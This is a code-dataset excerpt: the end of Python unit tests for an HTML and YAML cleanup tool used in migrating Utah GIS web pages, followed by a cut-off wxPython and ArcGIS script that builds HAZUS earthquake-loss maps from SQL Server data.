valid = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/><figcaption class="caption__text">Concept of an Address Locator</figcaption></div>'
self.assertEqual(cleanser.update_caption(test), valid)
test = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/></div>'
valid = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/></div>'
self.assertEqual(cleanser.update_caption(test), valid)
test = '<p>[caption id="attachment_18156" align="alignright" width="300" caption="The pendulum swings back and forth..."]<a href="{{ "/downloads/Screen-Shot-2015-11-27-at-12.39.23-PM.png" | prepend: site.baseurl }}"><img src="{{ "/images/Screen-Shot-2015-11-27-at-12.39.23-PM-300x220.png" | prepend: site.baseurl }}" alt="" title="The pendulum swings back and forth..." width="300" height="220" /></a>[/caption]</p>'
valid = '<div class="caption caption--right"><a href="{{ "/downloads/Screen-Shot-2015-11-27-at-12.39.23-PM.png" | prepend: site.baseurl }}"><img src="{{ "/images/Screen-Shot-2015-11-27-at-12.39.23-PM-300x220.png" | prepend: site.baseurl }}" alt="" title="The pendulum swings back and forth..." width="300" height="220" /></a><figcaption class="caption__text">The pendulum swings back and forth...</figcaption></div>'
self.assertEqual(cleanser.update_caption(test), valid)
def test_half_columns(self):
test = '''<div class="grid"><div class="grid__col grid__col--1-of-2">
<h3>Overview</h3>
</div>
<div class="grid__col grid__col--1-of-2">
<h3>SGID Datasets</h3>
</div></div>'''
valid = '''<div class="grid"><div class="grid__col grid__col--1-of-2">
<h3>Overview</h3>
</div>
<div class="grid__col grid__col--1-of-2">
<h3>SGID Datasets</h3>
</div></div>'''
self.assertEqual(cleanser.update_columns(test), valid)
def test_divider(self):
test = '<div class="divider"></div>'
valid = '<div class="divider"></div>'
self.assertEqual(cleanser.update_divider(test), valid)
test = '<div class="divider-padding"></div>'
valid = '<div class="divider-padding"></div>'
self.assertEqual(cleanser.update_divider(test), valid)
test = '<div class="divider-padding"></div>'
self.assertEqual(cleanser.update_divider(test), valid)
def test_icons(self):
test = '<span class="icon-text icon-download"><a title="Download available HRO imagery" href="https://raster.utah.gov/?catGroup=HRO%202012%20(12.5cm),HRO%202012%20(1ft),HRO%202009%20(25cm),HRO%202006%20(25cm),HRO%202003%20(30cm)&title=Utah%20HRO%20Imagery">HRO Orthophotography Interactive Map</a></span><br />'
valid = '<span class="icon-text icon-download"><a title="Download available HRO imagery" href="https://raster.utah.gov/?catGroup=HRO%202012%20(12.5cm),HRO%202012%20(1ft),HRO%202009%20(25cm),HRO%202006%20(25cm),HRO%202003%20(30cm)&title=Utah%20HRO%20Imagery">HRO Orthophotography Interactive Map</a></span><br />'
self.assertEqual(cleanser.update_icons(test), valid)
test = '<p><span class="icon-text icon-calendar">Last Update: March, 2013</span><br />'
valid = '<p><span class="icon-text icon-calendar">Last Update: March, 2013</span><br />'
self.assertEqual(cleanser.update_icons(test), valid)
def test_tables(self):
test = ' '
valid = ' '
self.assertEqual(cleanser.update_tables(test), valid)
test = '<div class="table-style">'
valid = '<div class="table-style">'
self.assertEqual(cleanser.update_tables(test), valid)
test = '<div class="table-style">'
self.assertEqual(cleanser.update_tables(test), valid)
test = '<div class="table-style">'
self.assertEqual(cleanser.update_tables(test), valid)
test = '</div>'
valid = '</div>'
self.assertEqual(cleanser.update_tables(test), valid)
def maybelater_tabs(self):
test = '<p><br />'
valid = '<p><br />'
self.assertEqual(cleanser.update_tabs(test), valid, msg='1')
test = '<p><br />'
self.assertEqual(cleanser.update_tabs(test), valid, msg='2')
test = '<p></p>'
valid = '<p></p>'
self.assertEqual(cleanser.update_tabs(test), valid, msg='3')
test = '<p><br />'
valid = '<p><br />'
self.assertEqual(cleanser.update_tabs(test), valid, msg='4')
test = '<p> </p>'
valid = '<p> </p>'
self.assertEqual(cleanser.update_tabs(test), valid)
test = '<p></p>'
valid = '<p></p>'
self.assertEqual(cleanser.update_tabs(test), valid, msg='6')
test = 'This dataset was last updated in 2002.</p>'
valid = 'This dataset was last updated in 2002.</p>'
self.assertEqual(cleanser.update_tabs(test), valid)
test = '<h5 class="tab-title">Contact</h5><br />'
valid = '<h5 class="tab-title">Contact</h5>'
self.assertEqual(cleanser.update_tabs(test), valid)
test = '<h5 class="tab-title">Contact</h5><br />'
self.assertEqual(cleanser.update_tabs(test), valid)
def create_data_package_page(self):
from os.path import join, dirname
file_path = join(dirname(__file__), 'data', 'index.html')
with open(file_path, 'r') as test_file, open(file_path.replace('index.html', 'testoutput.html'), 'wb') as updated:
file_content = []
for line_content in test_file.readlines():
file_content.append(line_content)
replaced = cleanser.update_tabs(file_content)
updated.writelines(replaced)
class TestYaml(unittest.TestCase):
def test_yaml_key_removal(self):
front_matter = yaml.load('''
layout: page
status: publish
published: true
title: Undreground Storage Tanks
author:
display_name: <NAME>
login: <NAME>
email: <EMAIL>
url: ''
author_login: <NAME>
author_email: <EMAIL>
wordpress_id: 1895
wordpress_url: http://gis.utah.gov/?page_id=1895
date: '2011-08-31 23:58:01 -0600'
date_gmt: '2011-09-01 05:58:01 -0600'
categories: []
tags:
- sgid
- Data
- utah
- gis
- map
- mapping
- dataset
- download
- agrc
- layer
- shapefile
- geodatabase
- metadata
- shp
- gdb
- kml
- lyr
- digital
- geographic
- information
- database
- state
- statewide''')
valid = set(['status', 'published', 'layout', 'title', 'author', 'date', 'categories', 'tags'])
valid_sub_keys = set(['display_name', 'email'])
front_matter = UpdateYaml.prune_keys(front_matter)
self.assertSetEqual(set(front_matter.keys()), valid)
self.assertSetEqual(set(front_matter['author'].keys()), valid_sub_keys)
def test_yaml_tag_removal(self):
front_matter = yaml.load('''
layout: page
status: publish
published: true
title: Undreground Storage Tanks
author:
display_name: <NAME>
login: <NAME>
email: <EMAIL>
url: ''
author_login: <NAME>
author_email: <EMAIL>
wordpress_id: 1895
wordpress_url: http://gis.utah.gov/?page_id=1895
date: '2011-08-31 23:58:01 -0600'
date_gmt: '2011-09-01 05:58:01 -0600'
categories: []
tags:
- sgid
- Data
- utah
- gis
- map
- mapping
- Geocoding
- geocoding
- agrc
- layer
- shapefile
- geodatabase
- metadata
- shp
- gdb
- kml
- lyr
- digital
- geographic
- deq
- information
- database
- state
- statewide''')
valid = ['data', 'geocoding', 'deq']
valid.sort()
tags = UpdateYaml.prune_tags(front_matter)
self.assertListEqual(tags, valid)
def test_pluck_yaml(self):
f = join(dirname(__file__), 'data', 'yaml.html')
with open(f, 'r') as html:
front_matter = UpdateYaml.pluck_yaml(html)
self.assertIsNotNone(front_matter)
def test_pluck_content(self):
f = join(dirname(__file__), 'data', 'yaml.html')
with open(f, 'r') as html:
content = ''.join(UpdateYaml.pluck_content(html))
self.assertEqual(content, '''<h1>This is the content of the file</h1>
<p>pretty cool</p>
<p>ok bye</p>
''')
``` |
{
"source": "joshgroeneveld/hazus-map-generator",
"score": 3
} |
#### File: joshgroeneveld/hazus-map-generator/HAZUS_Map_Automation.py
```python
import sys
import traceback
import wx
import os
import logging
import shutil
import sqlinstances
import pyodbc
import inspect
from arcpy import mapping
from arcpy import management
from arcpy import da
# 1. Initialize wxpython window
class MainFrame(wx.Frame):
logfile = None
def __init__(self, parent):
wx.Frame.__init__(self, parent, size=wx.Size(-1, -1))
if self.logfile is None:
self.logfile = 'C:\\Temp\\HAZUS_Map_Generator_Log.txt'
self.__initlogging()
self.main_panel = wx.Panel(self, wx.ID_ANY)
self.SetTitle("HAZUS Map Generator version 0.1.0")
self.sb = self.CreateStatusBar()
self.sb.SetStatusText("Please select a folder to store your maps.")
self.logger.info("Script initiated")
label_font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
label_font.MakeBold()
label_font.SetPointSize(14)
normal_font = wx.Font(10, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
box = wx.BoxSizer(wx.VERTICAL)
# the welcome box
welcome_staticbox = wx.StaticBox(self.main_panel, -1, "Welcome!", size=(-1, -1))
welcome_staticbox.SetOwnFont(label_font)
welcome_sizer = wx.StaticBoxSizer(welcome_staticbox)
# welcome text
welcomemessage = """The HAZUS Map Generator creates a series of maps of your choice based on a HAZUS analysis.
This tool assumes that you already have a HAZUS study region and that HAZUS has already finished analyzing the hazards in your study region.
Select your HAZUS Server and the study region from the list below to get started."""
welcome_text = wx.StaticText(self.main_panel, -1, welcomemessage)
welcome_text.SetFont(normal_font)
welcome_sizer.Add(welcome_text)
# the output folder picker box
output_directory_staticbox = wx.StaticBox(self.main_panel, -1, "Select a folder to store the maps", size=(-1, -1))
output_directory_staticbox.SetOwnFont(label_font)
output_directory_sizer = wx.StaticBoxSizer(output_directory_staticbox)
# Set up the menu to choose a directory from the system
self.output_directory_dialog_button = wx.Button(output_directory_staticbox, label="Browse...", size=wx.Size(-1, -1))
self.output_directory_dialog_button.SetFont(normal_font)
output_directory_sizer.Add(self.output_directory_dialog_button)
self.output_directory = ""
self.scenario_dir = ""
self.scenario_data_dir = ""
self.study_region_data = ""
self.output_directory_dialog_button.Bind(wx.EVT_BUTTON, self.select_output_directory)
# the server and database info box
self.serverinfo_staticbox = wx.StaticBox(self.main_panel, -1, "Server Information and Database Information", size=(-1, -1))
self.serverinfo_staticbox.SetOwnFont(label_font)
server_and_db_sizer = wx.StaticBoxSizer(self.serverinfo_staticbox, orient=wx.VERTICAL)
# Create a drop down menu to select the name of the HAZUS Server
server_box = wx.BoxSizer(wx.HORIZONTAL)
server_and_db_sizer.Add(server_box)
self.hazus_server_label = wx.StaticText(server_and_db_sizer.GetStaticBox(), -1, "Select your HAZUS Server")
self.hazus_server_label.SetFont(normal_font)
server_box.Add(self.hazus_server_label)
server_box.Add(wx.Size(20, 10))
self.hazus_server_choices = ["Server 1", "Server 2"]
self.hazus_server_list = wx.ComboBox(self.serverinfo_staticbox, -1, "", choices=self.hazus_server_choices, size=wx.Size(300, -1))
self.hazus_server_list.SetFont(normal_font)
server_box.Add(self.hazus_server_list)
self.hazus_server = ""
self.hazus_server_list.Bind(wx.EVT_COMBOBOX, self.select_hazus_server)
# the database info sizer -- nests under the server and database info box
database_box = wx.BoxSizer(wx.HORIZONTAL)
server_and_db_sizer.Add(database_box)
# Create a drop down menu to select the HAZUS Study Region
self.hazus_db_list = wx.StaticText(server_and_db_sizer.GetStaticBox(), -1, "Select your Study Region")
self.hazus_db_list.SetFont(normal_font)
database_box.Add(self.hazus_db_list)
database_box.Add(wx.Size(20, 10))
self.db_choices = ["Study Region 1", "Study Region 2"]
self.db_list = wx.ComboBox(self.serverinfo_staticbox, -1, "", choices=self.db_choices, size=wx.Size(300, -1))
self.db_list.SetFont(normal_font)
database_box.Add(self.db_list)
self.hazus_db = ""
self.db_list.Bind(wx.EVT_COMBOBOX, self.select_hazus_db)
# the create maps box
self.create_maps_staticbox = wx.StaticBox(self.main_panel, -1, "Choose your maps", size=wx.Size(-1, -1))
self.create_maps_staticbox.SetFont(normal_font)
self.create_maps_staticbox.SetOwnFont(label_font)
create_maps_sizer = wx.StaticBoxSizer(self.create_maps_staticbox, orient=wx.HORIZONTAL)
maps_to_select_box = wx.BoxSizer(wx.VERTICAL)
map_selection_buttons = wx.BoxSizer(wx.VERTICAL)
selected_maps_box = wx.BoxSizer(wx.VERTICAL)
# add the three vertical sizers to the horizontal container sizer
create_maps_sizer.Add(maps_to_select_box)
create_maps_sizer.Add(map_selection_buttons, 0, wx.ALL | wx.CENTER, 30)
create_maps_sizer.Add(selected_maps_box)
# add static text and a list box to the maps to select sizer
self.map_selection_label = wx.StaticText(create_maps_sizer.GetStaticBox(), -1, "Select the maps to create")
self.map_selection_label.SetFont(normal_font)
maps_to_select_box.Add(self.map_selection_label)
maps_to_select_box.Add(wx.Size(20, 10))
# Create a list box with all of the potential maps that the user can select
self.map_choices = ["Direct Economic Loss", "Shelter Needs", "Utility Damage",
"Building Inspection Needs", "Estimated Debris",
"Highway Infrastructure Damage", "Impaired Hospitals", "Water Infrastructure Damage",
"Search and Rescue Needs"]
self.map_list = wx.ListBox(create_maps_sizer.GetStaticBox(), -1, choices=self.map_choices, size=wx.Size(-1, -1), style=wx.LB_EXTENDED | wx.LB_SORT)
self.map_list.SetFont(normal_font)
maps_to_select_box.Add(self.map_list)
maps_to_select_size = self.map_list.GetSize()
# add buttons for the user to add and remove maps from the current selection
self.add_maps_to_selection = wx.Button(self.create_maps_staticbox, label="Add -->", size=wx.Size(-1, -1))
self.add_maps_to_selection.SetFont(normal_font)
self.remove_maps_from_selection = wx.Button(self.create_maps_staticbox, label="Remove <--", size=wx.Size(-1, -1))
self.remove_maps_from_selection.SetFont(normal_font)
map_selection_buttons.Add(self.add_maps_to_selection)
map_selection_buttons.Add(wx.Size(20, 10))
map_selection_buttons.Add(self.remove_maps_from_selection)
self.add_maps_to_selection.Bind(wx.EVT_BUTTON, self.select_maps)
self.remove_maps_from_selection.Bind(wx.EVT_BUTTON, self.deselect_maps)
# add static text and a list box to the selected maps sizer
self.selected_map_label = wx.StaticText(create_maps_sizer.GetStaticBox(), -1, "Selected maps")
self.selected_map_label.SetFont(normal_font)
selected_maps_box.Add(self.selected_map_label)
selected_maps_box.Add(wx.Size(20, 10))
self.selected_map_choices = []
self.selected_maps = []
self.selected_map_list = wx.ListBox(create_maps_sizer.GetStaticBox(), -1, style=wx.LB_EXTENDED | wx.LB_SORT, choices=self.selected_map_choices, size=maps_to_select_size)
self.selected_map_list.SetFont(normal_font)
selected_maps_box.Add(self.selected_map_list)
self.deselect_map_choices = []
self.map_extent = {}
# Disable the map selection lists until the user selects a server and a database
self.map_list.Disable()
self.selected_map_list.Disable()
# create a horizontal sizer to hold the Go and Reset buttons
primary_button_sizer = wx.BoxSizer(wx.HORIZONTAL)
# add in the buttons
self.create_maps = wx.Button(self.main_panel, label="Go!", size=wx.Size(150, 100))
self.create_maps.SetFont(label_font)
self.create_maps.SetBackgroundColour(wx.Colour(44,162,95))
primary_button_sizer.Add(self.create_maps, 0, wx.ALL, 20)
self.Bind(wx.EVT_BUTTON, self.copy_template, self.create_maps)
# Create a button that resets the form
self.reset_button = wx.Button(self.main_panel, label="Reset", size=wx.Size(150, 100))
self.reset_button.SetFont(label_font)
primary_button_sizer.Add(self.reset_button, 0, wx.ALL, 20)
# self.Bind(wx.EVT_BUTTON, self.OnReset, self.resetButton)
box.Add(welcome_sizer, 0.5, wx.EXPAND)
box.Add(output_directory_sizer, 0.5, wx.EXPAND)
box.Add(server_and_db_sizer, 0.5, wx.EXPAND)
box.Add(create_maps_sizer, 2, wx.EXPAND)
box.Add(primary_button_sizer, 1, wx.EXPAND)
# Set the panel to be the same size as the main sizer, then set the frame to be the
# same size as the panel
self.main_panel.SetSizerAndFit(box)
panel_size = self.main_panel.GetSize()
self.SetSize(panel_size)
# 2. Select output directory
def select_output_directory(self, event):
"""This function allows the user to choose an output directory and then generates a list
of available SQL Server instances for the user to select."""
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
dlg.Show()
if dlg.ShowModal() == wx.ID_OK:
self.output_directory = dlg.GetPath()
self.sb.SetStatusText("You chose %s" % self.output_directory)
self.logger.info("Output directory: " + self.output_directory)
dlg.Destroy()
self.hazus_server_choices = sqlinstances.list_sql_servers(self)
self.hazus_server_list.Clear()
for server in self.hazus_server_choices:
self.hazus_server_list.Append(server)
self.sb.SetStatusText("Please select your HAZUS Server")
# 3. Select HAZUS SQL Server instance
def select_hazus_server(self, event):
"""This function allows the user to select a HAZUS server (SQL Server instance) from a
drop down list, and then populates a drop down list of HAZUS study regions (databases)
for the user to select."""
self.hazus_server = self.hazus_server_list.GetValue()
self.sb.SetStatusText("You chose %s" % self.hazus_server)
self.logger.info("HAZUS Server: " + str(self.hazus_server))
# Populate the drop down menu of databases in the server
cxn = pyodbc.connect('DRIVER={SQL Server};SERVER=%s;DATABASE=master;UID="hazuspuser";'
'PASSWORD="<PASSWORD>";Trusted_Connection=yes' % str(self.hazus_server))
cursor = cxn.cursor()
cursor.execute("select name from sys.databases")
rows = cursor.fetchall()
self.db_list.Clear()
for row in rows:
self.db_list.Append(row[0])
self.sb.SetStatusText("Please select your HAZUS Study Region")
cxn.close()
# 4. Select HAZUS study region (SQL Server database)
def select_hazus_db(self, event):
"""This function allows the user to select a HAZUS Study Region (SQL Server Database) from
a drop down list, then enables the user to select the set of maps to generate."""
self.hazus_db = self.db_list.GetValue()
self.sb.SetStatusText("You chose %s" % self.hazus_db)
self.logger.info("HAZUS Database: " + str(self.hazus_db))
# Enable the map selection lists
self.map_list.Enable()
self.selected_map_list.Enable()
self.sb.SetStatusText("Please choose the maps you want to create")
# 5. Choose map or maps from list of templates and add to list of maps to create
def select_maps(self, event):
"""This function allows the user to select some or all of the available maps and add them
to the list of maps to create."""
self.selected_map_choices = list(self.map_list.GetSelections())
# Add the selected maps to the selected list, and remove these selections from the
# original list so that each map can only be selected once
for s in self.selected_map_choices:
selected_map = self.map_list.GetString(s)
self.selected_maps.append(selected_map)
self.map_choices.remove(selected_map)
self.logger.info("Added " + str(selected_map) + " to selection")
self.selected_map_list.Set(self.selected_maps)
self.map_list.Set(self.map_choices)
self.sb.SetStatusText("Click Go! to create maps or adjust your selections")
def deselect_maps(self, event):
"""This function allows the user to revise the current map selection before creating the maps."""
self.deselect_map_choices = list(self.selected_map_list.GetSelections())
for d in self.deselect_map_choices:
map_to_deselect = self.selected_map_list.GetString(d)
self.map_choices.append(map_to_deselect)
self.selected_maps.remove(map_to_deselect)
self.logger.info("Removed " + str(map_to_deselect) + " from selection")
self.selected_map_list.Set(self.selected_maps)
self.map_list.Set(self.map_choices)
self.sb.SetStatusText("Click Go! if you are happy with your selections")
# 6. Run the script
# 6a. Create the directory structure in output directory
# Copy the template shakemap geodatabase to a Data folder in the
# same directory as the earthquake name
def copy_template(self, event):
"""This function copies a template study region geodatabase and the
layer files into the selected output directory."""
temp = inspect.stack()[0][1]
script_dir = temp.replace('HAZUS_Map_Automation.py', "Template")
self.scenario_dir = self.output_directory + "\\" + self.hazus_db
self.scenario_data_dir = self.scenario_dir + "\\Scenario_Data"
self.study_region_data = self.scenario_data_dir + "\\Data\\StudyRegionData.mdb"
shutil.copytree(script_dir, self.scenario_data_dir)
self.sb.SetStatusText("Copied template data and maps to " + self.scenario_data_dir)
self.logger.info("Copied template data and maps to " + self.scenario_data_dir)
output_dirs = ["Summary_Reports", "JPEG", "PDF"]
os.chdir(self.scenario_dir)
for new_dir in output_dirs:
os.mkdir(new_dir)
self.sb.SetStatusText("Created output dirs in: " + self.scenario_dir)
self.connect_to_db()
# 6.b Extract data from SQL Server
# Use pyodbc to connect to SQL Server
def connect_to_db(self):
"""This function establishes a connection to the selected HAZUS database
to extract data for the selected maps."""
connection_str = """
DRIVER={SQL Server};
SERVER=%s;
DATABASE=%s;
UID=hazuspuser;
PWD=<PASSWORD>_01""" % (self.hazus_server, self.hazus_db)
conn = pyodbc.connect(connection_str)
self.sb.SetStatusText("Established connection to: " + self.hazus_db)
self.logger.info("Established connection to: " + self.hazus_db)
cursor = conn.cursor()
maps_to_create = []
for selected_map in self.selected_maps:
self.logger.info("Selected map list includes: " + selected_map)
lower_case = selected_map.lower()
no_spaces = lower_case.replace(" ", "_")
maps_to_create.append(str(no_spaces))
self.determine_map_extent(cursor)
# Call a function to extract the data needed for each map
# For example, if building inspection needs is one of the selected maps,
# the getattr() statement below generates the following:
# getattr(self, building_inspection_needs)(), which is equivalent to:
# self.building_inspection_needs()
for m in maps_to_create:
getattr(self, m)(cursor)
cursor.close()
conn.close()
self.sb.SetStatusText("Closed connection to the HAZUS database")
def determine_map_extent(self, cursor):
"""This function accepts a cursor from pyodbc to call the SQL Server
database and queries the database for all tracts in the current study
region. These tracts are then passed to arcpy to calculate the extent
of these tracts. This extent is returned out of the function and passed
to each of the maps selected."""
study_region_tracts_sql = """
SELECT Tract FROM hzTract
"""
cursor.execute(study_region_tracts_sql)
study_region_tracts = cursor.fetchall()
tracts_to_select = []
for sr_tract in study_region_tracts:
tracts_to_select.append(sr_tract[0])
# Convert list of tracts into a string to add to a selection query
str_tracts = str(tracts_to_select)
str_tracts = str_tracts.replace("[", "")
str_tracts = str_tracts.replace("]", "")
tract_fc = mapping.Layer(self.scenario_data_dir + "\\Data\\TotalEconLoss.lyr")
out_fl = self.scenario_data_dir + "\\Data\\Selected_Tracts.lyr"
management.MakeFeatureLayer(tract_fc, "temp_lyr")
lyr = mapping.Layer("temp_lyr")
lyr.definitionQuery = "[Tract] in (" + str_tracts + ")"
lyr.saveACopy(out_fl)
selection_layer = mapping.Layer(out_fl)
# Get extent of feature layer
tract_extent = selection_layer.getExtent()
# Return extent out of function as dictionary
self.map_extent["XMin"] = tract_extent.XMin
self.map_extent["XMax"] = tract_extent.XMax
self.map_extent["YMin"] = tract_extent.YMin
self.map_extent["YMax"] = tract_extent.YMax
self.sb.SetStatusText("Determined map extent")
# 6.c Create table queries to get only the data we need
# For each possible map, create a function to call the specific data needed
def building_inspection_needs(self, cursor):
"""This function creates the building inspection needs map by querying
the eqTractDmg table in the SQL Server database."""
self.logger.info("You want to make a building inspection needs map!")
# Get the data from SQL Server
building_inspection_sql = """
SELECT Tract, Sum(PDsSlightBC) as PDsSlightBC, Sum(PDsModerateBC) as PDsModerateBC,
Sum(PDsExtensiveBC) as PDsExtensiveBC, Sum(PDsCompleteBC) as PDsCompleteBC
FROM eqTractDmg WHERE DmgMechType='STR'
GROUP BY Tract
"""
cursor.execute(building_inspection_sql)
inspection_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for ins_tract in inspection_tracts:
tract = ins_tract.Tract
slight = ins_tract.PDsSlightBC
moderate = ins_tract.PDsModerateBC
extensive = ins_tract.PDsExtensiveBC
complete = ins_tract.PDsCompleteBC
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['PDsSlightBC', 'PDsModerateBC', 'PDsExtensiveBC', 'PDsCompleteBC', 'SL_MO_TOT']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = slight
urow[1] = moderate
urow[2] = extensive
urow[3] = complete
urow[4] = slight + moderate
urows.updateRow(urow)
self.update_fc(fc, 'PDsSlightBC')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\BuildingInspectionNeeds.mxd"
map_name = "BuildingInspectionNeeds"
self.update_and_export_map(mxd, map_name)
def direct_economic_loss(self, cursor):
"""This function creates a direct economic loss map by querying the
eqTractEconLoss table in the SQL Server database."""
self.logger.info("You want to make a direct economic loss map!")
# Get the data from SQL Server
economic_loss_sql = """
SELECT Tract, Sum(TotalLoss) as TotalLoss
FROM eqTractEconLoss
GROUP BY Tract
"""
cursor.execute(economic_loss_sql)
del_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for del_tract in del_tracts:
tract = del_tract.Tract
total_econ_loss = del_tract.TotalLoss
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['TotalEconLoss']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = total_econ_loss
urows.updateRow(urow)
self.update_fc(fc, 'TotalEconLoss')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\DirectEconomicLoss.mxd"
map_name = "DirectEconomicLoss"
self.update_and_export_map(mxd, map_name)
def estimated_debris(self, cursor):
"""This function creates an estimated debris map by querying the
eqTract table in the SQL Server database."""
self.logger.info("You want to make an estimated debris map!")
# Get the data from SQL Server
debris_sql = """
SELECT Tract, DebrisS, DebrisC, DebrisTotal
FROM eqTract
"""
cursor.execute(debris_sql)
debris_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for debris_tract in debris_tracts:
tract = debris_tract.Tract
debriss = debris_tract.DebrisS
debrisc = debris_tract.DebrisC
debris_total = debris_tract.DebrisTotal
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['DebrisS', 'DebrisC', 'DebrisTotal']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = debriss
urow[1] = debrisc
urow[2] = debris_total
urows.updateRow(urow)
self.update_fc(fc, 'DebrisTotal')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\EstimatedDebris.mxd"
map_name = "EstimatedDebris"
self.update_and_export_map(mxd, map_name)
def highway_infrastructure_damage(self, cursor):
"""This function creates a highway Infrastructure damage map by querying
the eqHighwayBridge and eqHighwaySegement tables in the SQL Server database."""
self.logger.info("You want to make a highway Infrastructure damage map!")
# Get the data from SQL Server
highways_sql = """
SELECT HighwaySegID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqHighwaySegment
"""
cursor.execute(highways_sql)
highways = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqHighwaySegment table
highway_fc = self.study_region_data + "\\eqHighwaySegment"
for highway in highways:
highway_id = highway.HighwaySegID
highway_moderate = highway.PDsExceedModerate
highway_functday1 = highway.FunctDay1
highway_econ_loss = highway.EconLoss
query = '[HighwaySegID] = ' + '\'' + highway_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(highway_fc, fields, query) as urows:
for urow in urows:
urow[0] = highway_moderate
urow[1] = highway_functday1
urow[2] = highway_econ_loss
urows.updateRow(urow)
self.update_fc(highway_fc, 'PDsExceedModerate')
# Get the data from SQL Server
bridges_sql = """
SELECT HighwayBridgeID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqHighwayBridge
"""
cursor.execute(bridges_sql)
bridges = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqHighwayBridge table
bridge_fc = self.study_region_data + "\\eqHighwayBridge"
for bridge in bridges:
bridge_id = bridge.HighwayBridgeID
bridge_moderate = bridge.PDsExceedModerate
bridge_functday1 = bridge.FunctDay1
bridge_econ_loss = bridge.EconLoss
query = '[HighwayBridgeId] = ' + '\'' + bridge_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(bridge_fc, fields, query) as urows:
for urow in urows:
urow[0] = bridge_moderate
urow[1] = bridge_functday1
urow[2] = bridge_econ_loss
urows.updateRow(urow)
self.update_fc(bridge_fc, 'PDsExceedModerate')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\HighwayInfrastructureDamage.mxd"
map_name = "HighwayInfrastructureDamage"
self.update_and_export_map(mxd, map_name)
def impaired_hospitals(self, cursor):
"""This function creates an impaired hospitals map by querying the
eqCareFlty table for hospital performance data and the eqTractCasOccup
table for life threatening injury data."""
self.logger.info("You want to make an impaired hospitals map!")
# Get the data from SQL Server
hospital_sql = """
SELECT CareFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqCareFlty
"""
injury_sql = """
SELECT Tract, Sum(Level1Injury) as Level1Injury, Sum(Level2Injury) as Level2Injury,
Sum(Level3Injury) as Level3Injury, Sum(Level4Injury) as Level4Injury
FROM eqTractCasOccup
WHERE CasTime = 'D' AND InOutTot = 'TOT'
GROUP BY Tract
"""
cursor.execute(hospital_sql)
hospitals = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqCareFlty table
hospital_fc = self.study_region_data + "\\eqCareFlty"
for hospital in hospitals:
hospital_id = hospital.CareFltyID
hospital_moderate = hospital.PDsExceedModerate
hospital_functday1 = hospital.FunctDay1
hospital_econ_loss = hospital.EconLoss
query = '[CareFltyId] = ' + '\'' + hospital_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(hospital_fc, fields, query) as urows:
for urow in urows:
urow[0] = hospital_moderate
urow[1] = hospital_functday1
urow[2] = hospital_econ_loss
urows.updateRow(urow)
self.update_fc(hospital_fc, 'PDsExceedModerate')
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
cursor.execute(injury_sql)
injury_tracts = cursor.fetchall()
fc = self.study_region_data + "\\eqTract"
for injury_tract in injury_tracts:
tract = injury_tract.Tract
level1 = injury_tract.Level1Injury
level2 = injury_tract.Level2Injury
level3 = injury_tract.Level3Injury
level4 = injury_tract.Level4Injury
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['Level1Injury', 'Level2Injury', 'Level3Injury', 'Level4Injury', 'SUM_2_3']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = level1
urow[1] = level2
urow[2] = level3
urow[3] = level4
urow[4] = level2 + level3
urows.updateRow(urow)
self.update_fc(fc, 'Level1Injury')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\ImpairedHospitals.mxd"
map_name = "ImpairedHospitals"
self.update_and_export_map(mxd, map_name)
def search_and_rescue_needs(self, cursor):
"""This function creates a search and rescue needs map by querying the
eqTractDmg table in the SQL Server database. Search and rescue needs are
represented by red tag (complete) damage buildings. Only a portion of these
buildings would be expected to collapse (e.g., 15 percent of URMs)."""
self.logger.info("You want to make a search and rescue needs map!")
# Get the data from SQL Server
sar_sql = """
SELECT Tract, Sum(PDsCompleteBC) as PDsCompleteBC
FROM eqTractDmg WHERE DmgMechType='STR'
GROUP BY Tract
"""
cursor.execute(sar_sql)
sar_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for sar_tract in sar_tracts:
tract = sar_tract.Tract
complete = sar_tract.PDsCompleteBC
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['PDsCompleteBC']
